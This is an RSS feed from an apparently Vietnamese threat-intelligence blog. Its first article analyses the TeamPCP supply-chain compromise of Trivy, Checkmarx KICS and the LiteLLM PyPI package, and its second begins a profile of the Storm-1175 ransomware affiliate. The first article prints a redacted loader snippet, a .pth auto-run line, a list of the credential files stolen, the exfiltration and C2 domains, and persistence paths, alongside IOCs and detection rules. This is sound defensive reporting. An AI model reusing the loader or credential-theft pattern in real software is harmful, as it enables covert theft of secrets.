<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[FPT IS Security]]></title><description><![CDATA[Dedicated to providing insightful articles on cybersecurity threat intelligence, aimed at empowering individuals and organizations to navigate the digital lands]]></description><link>https://blog.fiscybersec.com</link><image><url>https://cdn.hashnode.com/res/hashnode/image/upload/v1721645442241/d8c94de6-8dc2-4006-9c0d-075ec8bb63a5.png</url><title>FPT IS Security</title><link>https://blog.fiscybersec.com</link></image><generator>RSS for Node</generator><lastBuildDate>Fri, 10 Apr 2026 16:01:00 GMT</lastBuildDate><atom:link href="https://blog.fiscybersec.com/rss.xml" rel="self" type="application/rss+xml"/><language><![CDATA[en]]></language><ttl>60</ttl><item><title><![CDATA[TeamPCP Supply Chain Campaign: Khi Security Scanner Trở Thành Vũ Khí Tấn Công AI Infrastructure]]></title><description><![CDATA[Tổng quan chiến dịch
Ngày 24/03/2026, nhóm tấn công TeamPCP đã phát tán thành công hai phiên bản độc hại của thư viện Python LiteLLM (v1.82.7 và v1.82.8) lên PyPI — package registry với hơn 95 triệu l]]></description><link>https://blog.fiscybersec.com/teampcp-supply-chain-campaign-khi-security-scanner-tr-th-nh-v-kh-t-n-c-ng-ai-infrastructure</link><guid isPermaLink="true">https://blog.fiscybersec.com/teampcp-supply-chain-campaign-khi-security-scanner-tr-th-nh-v-kh-t-n-c-ng-ai-infrastructure</guid><category><![CDATA[Malware]]></category><category><![CDATA[Python]]></category><category><![CDATA[package]]></category><category><![CDATA[trivy]]></category><category><![CDATA[scanner]]></category><category><![CDATA[AI]]></category><category><![CDATA[threat intelligence]]></category><dc:creator><![CDATA[Vũ Nhật Lâm]]></dc:creator><pubDate>Thu, 09 Apr 2026 03:08:57 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/676511773cdd3c06f7b226ee/c1c1cbd7-4167-4ee6-a5fd-20eb838648fa.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>Tổng quan chiến dịch</h2>
<p>Ngày 24/03/2026, nhóm tấn công <strong>TeamPCP</strong> đã phát tán thành công hai phiên bản độc hại của thư viện Python <strong>LiteLLM</strong> (v1.82.7 và v1.82.8) lên PyPI — package registry với hơn <strong>95 triệu lượt tải mỗi tháng</strong>. Đây không phải sự cố đơn lẻ mà là mắt xích cuối trong một chiến dịch supply chain có hệ thống kéo dài gần một tháng, bắt đầu từ việc xâm phạm <strong>Trivy</strong> (công cụ vulnerability scanner), tiếp tục sang <strong>Checkmarx KICS</strong>, và kết thúc bằng LiteLLM — thư viện LLM proxy có mặt trong hầu hết các AI pipeline hiện đại.</p>
<p>Payload được cài vào thực thi ngay khi package được import, hoặc khi bất kỳ Python process nào khởi động (qua cơ chế <code>.pth</code> file). Mục tiêu thu thập: SSH keys, cloud credentials (AWS/GCP/Azure), Kubernetes secrets, database passwords, <code>.env</code> files, và ví tiền mã hóa. Dữ liệu được mã hóa bằng RSA-4096/AES-256-CBC rồi gửi về hạ tầng C2 do kẻ tấn công kiểm soát.</p>
<p><strong>Hành động ưu tiên ngay lập tức:</strong> Kiểm tra toàn bộ môi trường xem có cài LiteLLM trong khoảng thời gian 10:39–16:00 UTC ngày 24/03/2026 không. Nếu có — xem như đã bị compromise và rotate toàn bộ credentials.</p>
<hr />
<h2>1. Timeline Chiến Dịch</h2>
<table>
<thead>
<tr>
<th>Thời gian</th>
<th>Sự kiện</th>
</tr>
</thead>
<tbody><tr>
<td>28/02/2026</td>
<td>Bot tự động khai thác lỗ hổng <code>pull_request_target</code> trong repository Trivy, đánh cắp Personal Access Token (PAT). Aqua Security xử lý bề mặt nhưng bỏ sót residual access.</td>
</tr>
<tr>
<td>19/03/2026</td>
<td>TeamPCP dùng PAT còn tồn tại, force-push code độc hại vào <strong>76 trong 77 version tags</strong> của <code>aquasecurity/trivy-action</code> và toàn bộ tags của <code>setup-trivy</code>. Payload: infostealer harvesting cloud credentials từ CI/CD runners. CVE-2026-33634 (CVSS 9.4) được gán cho sự kiện này.</td>
</tr>
<tr>
<td>20/03/2026</td>
<td>Aqua Security phát hiện và thông báo công khai. Malicious artifacts bị gỡ khỏi distribution channels.</td>
</tr>
<tr>
<td>21–22/03/2026</td>
<td>TeamPCP mở rộng sang Docker Hub với malicious Trivy images. Ghi nhận worm-like propagation qua exposed SSH keys và Kubernetes APIs. Đồng thời defacement 44 internal repository của Aqua Security.</td>
</tr>
<tr>
<td>23/03/2026</td>
<td>Dùng credentials thu thập từ Trivy, TeamPCP compromise GitHub Actions của Checkmarx: <code>kics-github-action</code> và <code>ast-github-action</code>. Domain <code>checkmarx[.]zone</code> được kích hoạt làm C2.</td>
</tr>
<tr>
<td>24/03/2026 – 10:39 UTC</td>
<td>LiteLLM v1.82.7 được upload lên PyPI bởi tài khoản maintainer bị chiếm. Payload 12 dòng được nhúng vào <code>proxy_server.py</code>.</td>
</tr>
<tr>
<td>24/03/2026 – 10:52 UTC</td>
<td>LiteLLM v1.82.8 được push, bổ sung thêm <code>litellm_init.pth</code> để thực thi payload <strong>mỗi khi Python interpreter khởi động</strong>.</td>
</tr>
<tr>
<td>24/03/2026 – 11:48 UTC</td>
<td>Researcher Callum McMahon (FutureSearch) mở GitHub Issue #24512 sau khi máy crash do fork bomb từ <code>.pth</code> file.</td>
</tr>
<tr>
<td>24/03/2026 – 12:44 UTC</td>
<td>Kẻ tấn công dùng tài khoản maintainer chiếm được để close Issue #24512 và flood thread bằng <strong>88 bot comments từ 73 tài khoản trong vòng 102 giây</strong>.</td>
</tr>
<tr>
<td>24/03/2026 – 13:38 UTC</td>
<td>PyPI admins quarantine toàn bộ litellm package. Cả hai phiên bản độc hại bị gỡ. Tổng thời gian phân phối: ~59 phút.</td>
</tr>
</tbody></table>
<hr />
<h2>2. Attack Flow Theo MITRE ATT&amp;CK</h2>
<h3>Phase 1: Initial Access — Trivy CI/CD Compromise</h3>
<p>TeamPCP khai thác <code>pull_request_target</code> workflow — một cấu hình GitHub Actions phổ biến cho phép PR từ fork repository chạy trong context của repository gốc với quyền truy cập secrets. Sau khi đánh cắp PAT, nhóm này thực hiện <strong>imposter commit attack</strong>: force-push code độc hại vào tất cả version tags đang tồn tại.</p>
<p>Hệ quả: bất kỳ pipeline nào dùng <code>uses: aquasecurity/trivy-action@v0.x.x</code> — kể cả versions đã release từ trước — đều thực thi payload của kẻ tấn công kể từ ngày 19/03.</p>
<h3>Phase 2: Credential Harvesting &amp; Lateral Movement</h3>
<p><strong><code>kamikaze.sh</code></strong> — payload chính của Trivy wave — phát triển qua 3 versions:</p>
<ul>
<li><strong>Version 1:</strong> Script bash 150 dòng, fingerprinting môi trường và harvest AWS/GCP/Azure credentials qua Instance Metadata Service (IMDS)</li>
<li><strong>Version 2:</strong> Thêm SSH key extraction, .env file scanning, và Kubernetes secret enumeration</li>
<li><strong>Version 3:</strong> Multi-stage dropper với persistence mechanism</li>
</ul>
<p>Credentials từ Trivy → dùng để xâm nhập Checkmarx KICS → PYPI_PUBLISH token của LiteLLM bị lấy từ GitHub Actions runner chạy Trivy scan.</p>
<h3>Phase 3: PyPI Package Poisoning — LiteLLM</h3>
<p>Kẻ tấn công inject 12 dòng code vào <code>litellm/proxy/proxy_server.py</code> tại line 128, giữa hai block code hợp lệ không liên quan — một kỹ thuật steganography-style nhằm qua mặt code review:</p>
<pre><code class="language-python"># Malicious injection tại proxy_server.py:128
# [Base64-encoded payload được decode và thực thi qua subprocess]
# Không dùng exec() trực tiếp → bypass static analysis tools
import base64, subprocess, tempfile, os
_d = base64.b64decode("&lt;REDACTED_PAYLOAD&gt;")
_f = tempfile.NamedTemporaryFile(delete=False, suffix='.py')
_f.write(_d); _f.close()
subprocess.Popen(['python3', _f.name], ...)
</code></pre>
<p><strong>v1.82.8 bổ sung <code>litellm_init.pth</code>:</strong></p>
<pre><code># litellm_init.pth — đặt trong site-packages
# Python site.py process file này tự động mỗi interpreter startup
import subprocess; subprocess.Popen(['python3', '-c', '&lt;payload&gt;'], ...)
</code></pre>
<p>Cơ chế <code>.pth</code> là đặc biệt nguy hiểm: không cần <code>import litellm</code> — chỉ cần litellm được cài trong môi trường, payload sẽ chạy mỗi khi bất kỳ Python process nào khởi động. Đây là lý do tại sao McMahon's máy crash: child process trigger <code>.pth</code> → spawn thêm child → exponential fork bomb.</p>
<h3>Phase 4: Multi-Stage Payload Execution</h3>
<p><strong>Stage 1 — Credential Collection:</strong></p>
<p>Payload thu thập và đóng gói các file sau vào <code>tpcp.tar.gz</code>:</p>
<pre><code>~/.ssh/id_rsa, id_ed25519, config
~/.aws/credentials, ~/.aws/config
~/.config/gcloud/*, ~/.azure/*
~/.kube/config
**/.env files
~/.gitconfig, ~/.docker/config.json
Database passwords (PostgreSQL, MySQL)
Cryptocurrency wallet files
</code></pre>
<p>Archive được mã hóa: AES-256-CBC với session key ngẫu nhiên, session key được encrypt bằng RSA-4096 public key hardcoded, toàn bộ POST đến <code>https://models[.]litellm[.]cloud/</code> — domain giả mạo cố tình tương tự legitimate domain của LiteLLM.</p>
<p><strong>Stage 2 — Kubernetes Lateral Movement:</strong></p>
<p>Nếu tìm thấy Kubernetes service account token:</p>
<pre><code class="language-bash"># Payload enumerate tất cả nodes trong cluster
kubectl get nodes --all-namespaces
# Deploy privileged pod lên TỪNG node trong kube-system
# Pod mount host filesystem (/)
# Cài persistence dropper lên tất cả nodes
</code></pre>
<p><strong>Stage 3 — Persistent Backdoor:</strong></p>
<pre><code>~/.config/sysmon/sysmon.py          # Python backdoor script
~/.config/systemd/user/sysmon.service  # systemd service
Service name: "System Telemetry Service"
</code></pre>
<p>Backdoor poll C2 mỗi 50 phút: <code>GET checkmarx[.]zone/raw</code> → nhận URL → download và execute next-stage payload. Kill switch: nếu response chứa chuỗi <code>youtube.com</code>, dừng execution (anti-sandbox evasion).</p>
<p>Đối với Kubernetes environments, persistence được cài trên <strong>mọi node</strong> trong cluster thông qua privileged pods mount host filesystem.</p>
<hr />
<h2>3. Indicators of Compromise (IOC)</h2>
<h3>Network IOCs</h3>
<pre><code># C2 Domains
models[.]litellm[.]cloud     # Exfiltration endpoint (giả mạo LiteLLM)
checkmarx[.]zone             # C2 backdoor polling (giả mạo Checkmarx)
scan[.]aquasecurtiy[.]org    # Trivy wave C2 (typosquat aquasecurity)

# Registrar: Spaceship, Inc. | Hosting: DEMENIN B.V.
</code></pre>
<h3>Host-Based IOCs</h3>
<pre><code># Files
~/.config/sysmon/sysmon.py
~/.config/systemd/user/sysmon.service
/tmp/pglog                           # Fake PostgreSQL log
/tmp/.pg_state                       # State file
tpcp.tar.gz                          # Credential archive (tmp dirs)

# Python environment
litellm_init.pth (trong site-packages)
proxy_server.py (modified, nếu dùng litellm 1.82.7/1.82.8)
</code></pre>
<h3>Package Indicators</h3>
<pre><code># Malicious versions
litellm==1.82.7  (uploaded 2026-03-24 10:39:24 UTC)
litellm==1.82.8  (uploaded 2026-03-24 10:52:19 UTC)

# Last known-clean version
litellm==1.82.6  (published 2026-03-22, verified clean)
</code></pre>
<h3>GitHub IOCs</h3>
<pre><code># Repository patterns
docs-tpcp-* (repositories tạo bởi attacker trong victim org)
"teampcp update" (commit message)

# Telegram channels
@Persy_PCP
@teampcp
</code></pre>
<h3>Detection Query (pip / uv)</h3>
<pre><code class="language-bash"># Kiểm tra version hiện tại
pip show litellm | grep Version

# Tìm litellm_init.pth
find ~/.cache/uv -name "litellm_init.pth" 2&gt;/dev/null
find /usr -name "litellm_init.pth" 2&gt;/dev/null

# Kiểm tra persistence
ls -la ~/.config/sysmon/sysmon.py
ls -la ~/.config/systemd/user/sysmon.service

# Tìm artifact
find /tmp -name "tpcp.tar.gz" 2&gt;/dev/null
</code></pre>
<h3>Network Detection (SIEM/EDR)</h3>
<pre><code># Splunk/Elastic query
dest_domain IN ("models.litellm.cloud", "checkmarx.zone", "scan.aquasecurtiy.org")
AND (http_method="POST" OR http_method="GET")

# Zeek/Suricata — flag outbound POST to exfil domain
alert http any any -&gt; any any (
  msg:"TeamPCP LiteLLM Exfiltration Attempt";
  content:"models.litellm.cloud"; http_header;
  content:"POST"; http_method;
  sid:2026001; rev:1;
)
</code></pre>
<hr />
<h2>4. MITRE ATT&amp;CK Mapping</h2>
<table>
<thead>
<tr>
<th>Tactic</th>
<th>Technique</th>
<th>Chi tiết</th>
</tr>
</thead>
<tbody><tr>
<td>Initial Access</td>
<td>T1195.002 — Compromise Software Supply Chain</td>
<td>Trojanize LiteLLM PyPI package</td>
</tr>
<tr>
<td>Initial Access</td>
<td>T1078.004 — Valid Accounts: Cloud Accounts</td>
<td>Chiếm maintainer PyPI account</td>
</tr>
<tr>
<td>Execution</td>
<td>T1059.006 — Python</td>
<td>Payload Python thực thi qua subprocess</td>
</tr>
<tr>
<td>Execution</td>
<td>T1072 — Software Deployment Tools</td>
<td>Trigger qua pip install / Python startup</td>
</tr>
<tr>
<td>Persistence</td>
<td>T1546.004 — .bash_profile / .pth hijack</td>
<td><code>litellm_init.pth</code> execute mọi Python startup</td>
</tr>
<tr>
<td>Persistence</td>
<td>T1543.002 — Systemd Service</td>
<td><code>sysmon.service</code> persistent backdoor</td>
</tr>
<tr>
<td>Defense Evasion</td>
<td>T1027 — Obfuscated Files/Information</td>
<td>Base64-encoded payload, subprocess thay vì exec()</td>
</tr>
<tr>
<td>Defense Evasion</td>
<td>T1036.004 — Masquerade Task/Service</td>
<td>Service tên "System Telemetry Service", fake PostgreSQL</td>
</tr>
<tr>
<td>Credential Access</td>
<td>T1552.001 — Credentials in Files</td>
<td>Thu thập .env, .aws, .ssh, .kube/config</td>
</tr>
<tr>
<td>Credential Access</td>
<td>T1552.004 — Private Keys</td>
<td>SSH private keys</td>
</tr>
<tr>
<td>Discovery</td>
<td>T1082 — System Information Discovery</td>
<td>Fingerprinting môi trường</td>
</tr>
<tr>
<td>Lateral Movement</td>
<td>T1610 — Deploy Container</td>
<td>Deploy privileged pods trên mọi Kubernetes node</td>
</tr>
<tr>
<td>Collection</td>
<td>T1560.001 — Archive via Utility</td>
<td>Đóng gói credentials vào tpcp.tar.gz</td>
</tr>
<tr>
<td>Exfiltration</td>
<td>T1048.003 — Exfiltration Over HTTPS</td>
<td>POST mã hóa đến models.litellm.cloud</td>
</tr>
<tr>
<td>C2</td>
<td>T1071.001 — Web Protocols</td>
<td>Backdoor poll HTTP mỗi 50 phút</td>
</tr>
<tr>
<td>C2</td>
<td>T1568 — Dynamic Resolution</td>
<td>ICP canister làm dead-drop C2 (CanisterWorm variant)</td>
</tr>
</tbody></table>
<hr />
<h2>5. Thông tin về kẻ tấn công: TeamPCP</h2>
<p>TeamPCP (còn được track dưới các alias <strong>PCPcat, Persy_PCP, ShellForce, DeadCatx3</strong> theo Wiz Threat Center) hoạt động từ ít nhất tháng 12/2025. Nhóm này embed chuỗi <code>"TeamPCP Cloud stealer"</code> trực tiếp trong payload — không cố che giấu attribution, có thể là cố ý để tạo tiếng vang hoặc phục vụ mục đích recruitment.</p>
<p><strong>Pattern đặc trưng của TeamPCP:</strong></p>
<p>Mỗi target không phải là đích cuối — mà là <strong>bàn đạp sang target tiếp theo</strong>. Trivy cho credentials để vào KICS; KICS cho PYPI_PUBLISH token của LiteLLM. Đây là chiến lược credential chaining có tính toán, không phải opportunistic attack.</p>
<p><strong>Chiến lược target selection:</strong> TeamPCP ưu tiên <strong>security-adjacent tools</strong> — vulnerability scanners, IaC analyzers, LLM proxies. Lý do rõ ràng: các công cụ này chạy với elevated privileges theo design, có quyền truy cập rộng vào credentials và infrastructure. Compromise một security tool là compromise toàn bộ những gì tool đó có quyền truy cập.</p>
<p><strong>Kỹ thuật đáng chú ý:</strong></p>
<ul>
<li>Dùng <strong>AI agent (openclaw)</strong> để automated attack targeting — một trong những case đầu tiên ghi nhận AI agent trong supply chain attacks</li>
<li><strong>CanisterWorm</strong> dùng Internet Computer Protocol (ICP) làm C2 — không thể takedown bởi domain registrar hay hosting provider</li>
<li>Dùng <strong>previously compromised developer accounts</strong> thay vì purpose-created accounts cho botnet comments</li>
<li><strong>76% account overlap</strong> giữa botnet dùng trong Trivy disclosure và LiteLLM incident (theo phân tích của Rami McCarthy)</li>
</ul>
<p><strong>LiteLLM compromise là Phase 09</strong> trong chiến dịch đang diễn ra. Endor Labs nhận định với <strong>high confidence</strong> rằng campaign này chưa kết thúc.</p>
<hr />
<h2>6. Nhận Định</h2>
<p>Về mặt kỹ thuật, LiteLLM attack không đặc biệt sophisticated — payload đơn giản, cơ chế <code>.pth</code> là kỹ thuật đã biết. Điều làm sự cố này đáng lo ngại là <strong>vị trí chiến lược</strong> của LiteLLM trong stack AI hiện đại.</p>
<p>LiteLLM không phải library thông thường. Đây là LLM gateway — nghĩa là nó nắm giữ API keys cho hàng chục providers: OpenAI, Anthropic, Google Vertex, AWS Bedrock, Azure OpenAI. Một instance LiteLLM bị compromise không mất một credentials; nó mất <strong>tất cả credentials của toàn bộ AI stack</strong>. Đây là lý do TeamPCP nhắm vào nó: ROI trên mỗi compromise là cực kỳ cao.</p>
<p>Điểm đặc biệt đáng chú ý với góc nhìn SOC: <strong>incident này được phát hiện không phải bởi EDR, SIEM, hay bất kỳ security tool nào</strong> — mà bởi developer nhận ra máy mình đột ngột đơ do fork bomb. Nếu không có bug trong malware, rất có thể campaign này vẫn đang diễn ra. Security team không nên tự an ủi bằng việc nói "chúng tôi có EDR" — EDR của bạn có monitor được developer laptop khi họ làm việc từ xa không? Có detect được outbound HTTPS POST đến một domain trông hoàn toàn legitimate như <code>models.litellm.cloud</code> không?</p>
<p>Với các tổ chức tại Việt Nam: LiteLLM xuất hiện trong <strong>36% cloud environments</strong> theo Wiz Research. Nếu tổ chức đang triển khai AI agents, MCP servers, hoặc bất kỳ LLM orchestration nào trong 6 tháng gần đây — khả năng cao LiteLLM là transitive dependency trong stack. Rủi ro không chỉ ở chỗ tổ chức có cài LiteLLM trực tiếp hay không.</p>
<p>Pattern lớn hơn cần nhận ra: đây là <strong>escalation từ CI/CD environment (build-time attack) sang developer machine và production environment (runtime attack)</strong>. Traditional supply chain defense tập trung vào build pipeline; TeamPCP đã pivot sang nơi credentials thực sự tồn tại — developer workstations. Đây là shift cần điều chỉnh lại threat model.</p>
<hr />
<h2>7. Khuyến Nghị</h2>
<h3>Ngay lập tức (0–24h)</h3>
<p><strong>Kiểm tra exposure:</strong></p>
<pre><code class="language-bash"># Kiểm tra version LiteLLM đang cài
pip show litellm 2&gt;/dev/null | grep -E "^Version|^Location"
pip list --format=freeze | grep litellm

# Kiểm tra trong tất cả virtual environments
find / -name "litellm_init.pth" 2&gt;/dev/null
find / -path "*/litellm/proxy/proxy_server.py" -exec grep -l "tpcp\|base64" {} \; 2&gt;/dev/null

# Kiểm tra persistence
[ -f ~/.config/sysmon/sysmon.py ] &amp;&amp; echo "COMPROMISED: sysmon.py found"
[ -f ~/.config/systemd/user/sysmon.service ] &amp;&amp; echo "COMPROMISED: sysmon.service found"
</code></pre>
<p><strong>Nếu phát hiện v1.82.7 hoặc v1.82.8 từng được cài:</strong></p>
<pre><code class="language-bash"># Gỡ package và purge cache
pip uninstall litellm -y
pip cache purge
rm -rf ~/.cache/uv

# Cài lại version sạch
pip install litellm==1.82.6
</code></pre>
<p><strong>Rotate credentials theo thứ tự ưu tiên:</strong></p>
<ol>
<li>PyPI tokens (nếu bạn là package maintainer)</li>
<li>Cloud provider credentials (AWS IAM, GCP service accounts, Azure SP)</li>
<li>Kubernetes kubeconfig và service account tokens</li>
<li>SSH keys</li>
<li>API keys trong <code>.env</code> files</li>
<li>Database credentials</li>
<li>GitHub Personal Access Tokens</li>
</ol>
<p><strong>Kiểm tra network logs cho traffic đến:</strong></p>
<pre><code>models.litellm.cloud
checkmarx.zone
scan.aquasecurtiy.org
</code></pre>
<p><strong>Audit Kubernetes cluster</strong> (nếu applicable):</p>
<pre><code class="language-bash"># Tìm unauthorized pods trong kube-system
kubectl get pods -n kube-system | grep -E "node-setup|alpine"

# Kiểm tra cluster secrets có bị truy cập
kubectl get events --all-namespaces | grep -i "secret"

# Tìm repos docs-tpcp
gh api /orgs/&lt;YOUR_ORG&gt;/repos | jq '.[].name' | grep docs-tpcp
</code></pre>
<h3>Ngắn hạn (1–7 ngày)</h3>
<p><strong>Dependency audit toàn bộ codebase:</strong></p>
<pre><code class="language-bash"># Tìm LiteLLM trong tất cả requirements files
grep -r "litellm" . --include="*.txt" --include="*.toml" --include="*.cfg"

# Kiểm tra transitive dependencies
pip-audit --requirement requirements.txt
# hoặc
safety check -r requirements.txt
</code></pre>
<p><strong>Pin versions trong tất cả dependency files:</strong></p>
<pre><code># requirements.txt
litellm==1.82.6  # verified clean, pin explicitly
</code></pre>
<p><strong>Audit CI/CD pipelines</strong> cho Trivy và Checkmarx usage:</p>
<pre><code class="language-yaml"># Thay thế unpinned versions
# TRƯỚC (nguy hiểm)
uses: aquasecurity/trivy-action@v0.20.0

# SAU (an toàn — dùng commit SHA)
uses: aquasecurity/trivy-action@9b2b452e66...  # verify SHA từ official channel
</code></pre>
<p><strong>Thêm network egress monitoring:</strong> Block outbound connections từ build environments đến các domain ngoài whitelist. Developer laptops có security tools nên monitor unusual outbound HTTPS POST, đặc biệt đến domains mới registered.</p>
<h3>Dài hạn</h3>
<p><strong>Adopt dependency pinning strategy:</strong></p>
<ul>
<li>Dùng lock files (<code>poetry.lock</code>, <code>uv.lock</code>, <code>requirements.txt</code> với hashes) cho tất cả production deployments</li>
<li>Implement private package mirror (Artifactory, Nexus) với malware scanning trước khi packages được phép vào môi trường nội bộ</li>
<li>SBOM (Software Bill of Materials) generation tự động trong CI/CD để có inventory đầy đủ về transitive dependencies</li>
</ul>
<p><strong>Tăng cường CI/CD security:</strong></p>
<ul>
<li>Không bao giờ dùng <code>GITHUB_TOKEN</code> hay secrets trong workflow được trigger bởi <code>pull_request_target</code> từ forks</li>
<li>Pin tất cả GitHub Actions theo commit SHA, không theo version tags (tags có thể bị force-push)</li>
<li>Implement OIDC token thay vì long-lived API tokens cho PyPI publishing</li>
</ul>
<p><strong>Xây dựng detection capability:</strong></p>
<ul>
<li>Triển khai EDR với visibility trên developer endpoints, không chỉ production servers</li>
<li>Tích hợp PyPI malware feeds (Sonatype OSS Index, Checkmarx SCA, Snyk) vào CI/CD gate</li>
<li>Alert trên <code>.pth</code> file creation trong Python site-packages directories</li>
<li>Monitor systemd user services mới được tạo trên Linux endpoints</li>
</ul>
<p><strong>Governance cho AI tooling:</strong></p>
<ul>
<li>Inventory toàn bộ AI-related packages đang dùng trong tổ chức</li>
<li>Assign owner cho mỗi AI agent/tool đang vận hành</li>
<li>Áp dụng principle of least privilege cho AI agent credentials — ephemeral tokens thay vì long-lived API keys</li>
<li>Không để AI agents kết nối trực tiếp với production systems trong giai đoạn experimentation</li>
</ul>
<hr />
<h2>8. Tài Liệu Tham Khảo</h2>
<ol>
<li>Orca Security — <em>LiteLLM Supply Chain Attack: Malware &amp; Mitigation</em> (2026-03-24)</li>
<li>Endor Labs — <em>TeamPCP Isn't Done: Threat Actor Behind Trivy and KICS Compromises Now Hits LiteLLM's 95 Million Monthly Downloads on PyPI</em> (2026-03-24)</li>
<li>Snyk — <em>How a Poisoned Security Scanner Became the Key to Backdooring LiteLLM</em> (2026-03-26)</li>
<li>FutureSearch / Callum McMahon — <em>litellm 1.82.8 Supply Chain Attack on PyPI (March 2026)</em> (2026-03-24)</li>
<li>Palo Alto Networks Unit 42 — <em>Weaponizing the Protectors: TeamPCP's Multi-Stage Supply Chain Attack on Security Infrastructure</em> (2026-04-01)</li>
<li>Arctic Wolf — <em>TeamPCP Supply Chain Attack Campaign Targets Trivy, Checkmarx (KICS), and LiteLLM</em> (2026-03-24)</li>
<li>Kaspersky — <em>Trojanization of Trivy, Checkmarx, and LiteLLM solutions</em> (2026-04-03)</li>
<li>SANS Institute — <em>When the Security Scanner Became the Weapon: Inside the TeamPCP Supply Chain Campaign</em> (2026-04-03)</li>
<li>LiteLLM Official — <em>Security Update: Suspected Supply Chain Incident</em> (2026-03-24)</li>
<li>GitGuardian — <em>How GitGuardian Enables Rapid Response to the LiteLLM Supply Chain Attack</em> (2026-03-30)</li>
<li>Sonatype — <em>Compromised litellm PyPI Package Delivers Multi-Stage Credential Stealer</em> (2026-04-03)</li>
<li>InfoQ — <em>PyPI Supply Chain Attack Compromises LiteLLM, Enabling the Exfiltration of Sensitive Information</em> (2026-04-01)</li>
</ol>
]]></content:encoded></item><item><title><![CDATA[Zero-day + tốc độ 24h: Storm-1175 đang thay đổi cuộc chơi ransomware]]></title><description><![CDATA[Tóm tắt chiến dịch
Nhóm tin tặc mang động cơ tài chính có liên hệ với Trung Quốc — Storm-1175 — đang gióng lên hồi chuông báo động ở mức cao nhất khi kết hợp năng lực khai thác lỗ hổng Zero-day (hiếm ]]></description><link>https://blog.fiscybersec.com/zero-day-t-c-24h-storm-1175-ang-thay-i-cu-c-ch-i-ransomware</link><guid isPermaLink="true">https://blog.fiscybersec.com/zero-day-t-c-24h-storm-1175-ang-thay-i-cu-c-ch-i-ransomware</guid><category><![CDATA[Storm-1175]]></category><category><![CDATA[Malware]]></category><category><![CDATA[zero day]]></category><category><![CDATA[healthcare]]></category><category><![CDATA[medusa ransomware]]></category><category><![CDATA[Fortra GoAnywhere]]></category><category><![CDATA[smartretail]]></category><category><![CDATA[threat intelligence]]></category><dc:creator><![CDATA[Lưu Tuấn Anh]]></dc:creator><pubDate>Thu, 09 Apr 2026 03:08:28 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/7d1d96bf-dd21-48b3-a5d2-0acda5f331ff.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>Tóm tắt chiến dịch</h2>
<p>Nhóm tin tặc mang động cơ tài chính có liên hệ với Trung Quốc — <strong>Storm-1175</strong> — đang gióng lên hồi chuông báo động ở mức cao nhất khi kết hợp năng lực khai thác lỗ hổng Zero-day (hiếm thấy ở các băng đảng tống tiền) vào hệ sinh thái Medusa Ransomware. Thay vì dùng phishing hay mua lại thông tin đăng nhập, Storm-1175 trực tiếp săn lùng bộ đệm các ứng dụng Web-facing và khai thác hàng loạt lỗ hổng bảo mật nghiêm trọng một tuần trước khi mã CVE được công bố ra công chúng.</p>
<p>Chiến dịch này đặc biệt leo thang nhắm vào ngành Y tế (Healthcare) và cơ sở hạ tầng trọng yếu tại Mỹ, Anh, Úc. Với tốc độ lây nhiễm chớp nhoáng (dwell time chỉ vỏn vẹn từ 5-6 ngày, cá biệt có sự cố nổ mã hoá dưới 24 giờ), năng lực phát triển exploit của Storm-1175 đã xóa nhòa lằn ranh giữa tội phạm mạng thông thường và các tổ chức APT do chính phủ hậu thuẫn.</p>
<p>Hành động cấp bách: Các tổ chức đang phơi xuất (expose) dịch vụ MFT, Email Server hoặc hệ thống RMM ra ngoài Internet cần xem xét lại hoàn toàn mô hình phòng ngự, do "window of exposure" (khoảng thời gian an toàn trước khi bản vá được phát hành) hiện tại đã xấp xỉ bằng Không.</p>
<h2><strong>Hồ sơ Nhóm Tin tặc</strong></h2>
<p>Theo hồ sơ tình báo từ Microsoft Threat Intelligence (công bố tháng 4/2026), <strong>Storm-1175</strong> là một nhóm tin tặc mang động cơ tài chính (financially motivated cybercriminal) bắt nguồn từ Trung Quốc. Nhóm này không trực tiếp phát triển mã độc tống tiền mà đóng vai trò là một nhánh <strong>Affiliate (Đại lý đánh thuê)</strong> cực kì năng nổ cho nền tảng Medusa Ransomware-as-a-Service (RaaS) từ ít nhất là năm 2023.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/dc85cf81-c8b5-49c4-9aa3-534858560e8b.png" alt="" style="display:block;margin:0 auto" />

<h3><strong>Lịch sử Hình thành và Đặc điểm Hoạt động</strong></h3>
<p>Danh xưng "Storm" là quy ước đặt tên của Microsoft dành cho các nhóm đe dọa mới nổi chưa định danh chính thức rành mạch (unattributed/emerging). Mặc dù có dấu vết IP và hạ tầng từ Trung Quốc, hành vi của Storm-1175 hoàn toàn nhắm tới lợi ích tài chính thông qua tống tiền kép, chứ không mang màu sắc tình báo hay phá hoại chính trị gián điệp của lực lượng vũ trang nhà nước (như PLA hay MSS).</p>
<p>Tuy nhiên, điểm dị biệt biến Storm-1175 thành nỗi ác mộng kinh hoàng chính là nguồn lực vũ khí của chúng. Một RaaS Affiliate thông thường chỉ xài lại N-day (lỗ hổng cũ đã có trên mạng) hoặc đi mua thông tin đăng nhập từ Web đen. Trong khi đó, Storm-1175 sở hữu khả năng tác chiến với <strong>Zero-day</strong> (vũ khí tinh vi vốn chỉ nằm trong tay hacker được chính phủ tài trợ). Sự giao thoa này gióng lên viễn cảnh: Storm-1175 có thể đang ngầm mua lại năng lực từ các sàn giao dịch Exploit đen, hoặc có sự chia sẻ thông tin phi chính thức từ hệ sinh thái nghiên cứu lỗ hổng nội địa Trung Quốc.</p>
<h3>Các vụ tấn công nổi bật</h3>
<p><strong>Thảm họa SimonMed Imaging (Tháng 1/2025):</strong> Bước đầu nhắm vào công ty cung cấp dịch vụ chụp chiếu y khoa lớn bậc nhất nước Mỹ. Storm-1175 đã vơ vét 2 Terabytes dữ liệu nhạy cảm, tiếp tay làm lộ hồ sơ bệnh án của 1.27 triệu bệnh nhân và ngả bài đòi 1 triệu USD.</p>
<p><strong>Vụ sập hạ tầng HCRG Care Group (Tháng 2/2025):</strong> Tấn công một trong những công ty cung cấp y tế tư nhân lớn nhất tại Anh, đánh cắp thành công 2.3 Terabytes dữ liệu và đưa ra yêu sách 2 triệu USD.</p>
